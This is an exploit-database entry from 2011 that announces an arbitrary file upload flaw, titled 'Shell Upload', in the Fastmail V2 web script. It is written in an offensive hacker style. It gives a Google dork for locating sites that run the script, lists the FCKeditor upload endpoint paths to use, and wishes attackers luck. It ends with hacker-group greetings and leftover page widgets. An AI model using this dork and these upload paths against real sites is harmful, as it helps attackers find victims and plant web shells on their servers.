Fastmail 2 Shell Upload

2011.08.10
Credit: Net.Edit0r
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

__________.__ __ ___ ___ \______ \ | _____ ____ | | __ / | \ ____ | | _/ | \__ \ _/ ___\| |/ / ______ / ~ \/ ___\ | | \ |__/ __ \\ \___| < /_____/ \ Y / /_/ > |______ /____(____ /\___ >__|_ \ \___|_ /\___ / \/ \/ \/ \/ \//_____/ .ORG [+] Info================================================================= [-] Title : Fastmail V.2 Script Arbitrary File Upload Vulnerability [-] Author: Net.Edit0r [-] Home : Black-HG.Org ~ h4ckcity.org [-] Website : 1337day.com [-] Vendor: http://fastemail.ir/ [-] Software Link: http://dl.webalfa.net/files/FastMail_V2-(www.webalfa.ir).zip [-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net [-] Date : 10/08/2011 [-] Google Dork : "powered by fastmail ver 2.0" [-] Category : webapps / 0day [-] Special Thanks : Amir-Magic ~ cyrus ~ Mikili ~ b3hz4d [+] Exploit=============================================================== [-] uploader :) # http://[localhost]/FCKeditor/editor/filemanager/upload/php/upload.php # http://[localhost]/FCKeditor/editor/filemanager/upload/test.html [-] Upload Testing ! # Allow extention : "jpg','gif','jpeg','png" ^_^ G00d LUCK ALL :=) [+] Greets===================================================================+ + DarkCoder, Dr.Niloo, Hurr!c4nE , hossin , _Attack_, D3adlY, 3H34N , Tre0r + s3cure.p0rt, 1337day.com, packetstormsecurity.org, Exploit-id.com, Over-x + h4ckcity.org, pentesters.ir, mn-team.net [PersianGulf F0r Ever] + <3 I Love You iRAN Far==>D <3 + + =============================================================================+


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top